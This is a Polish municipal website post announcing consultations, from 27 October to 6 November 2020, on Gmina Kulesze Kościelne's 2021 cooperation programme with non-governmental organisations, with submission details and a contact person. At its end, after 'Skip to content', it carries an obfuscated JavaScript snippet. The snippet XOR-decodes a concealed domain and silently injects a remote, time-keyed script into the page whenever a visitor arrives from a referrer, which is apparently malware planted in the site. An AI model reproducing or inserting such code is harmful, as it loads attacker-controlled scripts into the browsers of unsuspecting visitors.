Aktualności

Ogłoszenie o konsultacjach projektu „Programu współpracy Gminy Kulesze Kościelne z organizacjami pozarządowymi oraz podmiotami wymienionymi w art. 3 ust. 3 ustawy z dnia 24 kwietnia 2003 roku o działalności pożytku publicznego o wolontariacie na 2021 rok.

paź 26, 2020 | Aktualności, Ogłoszenia

Wójt Gminy Kulesze Kościelne zaprasza organizacje pozarządowe działające
na terenie Gminy Kulesze Kościelne oraz inne podmioty wymienione w art. 3 ust. 3 ustawy
z dnia 24 kwietnia 2003 r. o działalności pożytku publicznego i o wolontariacie (Dz. U.
z 2020 r. poz. 1057) do udziału w konsultacjach projektu „Programu współpracy Gminy Kulesze Kościelne z organizacjami pozarządowymi oraz podmiotami wymienionymi
w art. 3 ust. 3 ustawy z dnia 24 kwietnia 2003 roku o działalności pożytku publicznego
i o wolontariacie na  2021 rok”.

Konsultacje przeprowadzane są zgodnie z zapisami Uchwały 60/XII/2012 Rady Gminy Kulesze Kościelne z dnia 8 lutego 2012 roku w sprawie określenia szczegółowego sposobu konsultowania aktów prawa miejscowego  (Dz. Urz. Woj. Podl. poz. 736).

Celem konsultacji jest zebranie opinii w związku z przygotowaniem projektu „Programu współpracy Gminy Kulesze Kościelne z organizacjami pozarządowymi oraz podmiotami wymienionymi w art. 3 ust. 3 ustawy z dnia 24 kwietnia 2003 roku o działalności pożytku publicznego i o wolontariacie na  2021 rok”.

Projekt programu współpracy wraz z formularzem zgłaszania uwag i wniosków dostępny jest na stronie internetowej www.kuleszek.pl, na stronie BIP oraz na tablicy ogłoszeń Urzędu Gminy w Kuleszach Kościelnych.

Uwagi i wnioski należy kierować w formie pisemnej za pośrednictwem:

– poczty elektronicznej na adres: ,

– poczty tradycyjnej na adres: Urząd Gminy w Kuleszach Kościelnych, ul. Główna 6, 18-208 Kulesze Kościelne na formularzu zgłaszania uwag i wniosków do projektu programu współpracy w terminie  od 27 października  2020 roku do 6 listopada 2020 roku.

Formularze anonimowe lub nie zawierające uzasadnienia nie będą rozpatrywane.

Informacja o wynikach przeprowadzenia konsultacji zostanie zamieszczona na stronie internetowej nie później niż w ciągu 30 dni od dnia zakończenia konsultacji.

Wyjaśnienia i informacje dotyczące projektu programu współpracy można uzyskać
w pok. nr 10 Urzędu Gminy w Kuleszach Kościelnych Osobą odpowiedzialną
za przeprowadzenie konsultacji oraz przyjmowanie uwag i wniosków jest Marzena Frankowska tel.: 86 4769010 wew. 15.

Wójt Gminy

Stefan Grodzki

Kulesze Kościelne, 26 października 2020 roku

Więcej informacji:

https://kuleszek.bip.gmina.pl/index.php?id=498

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);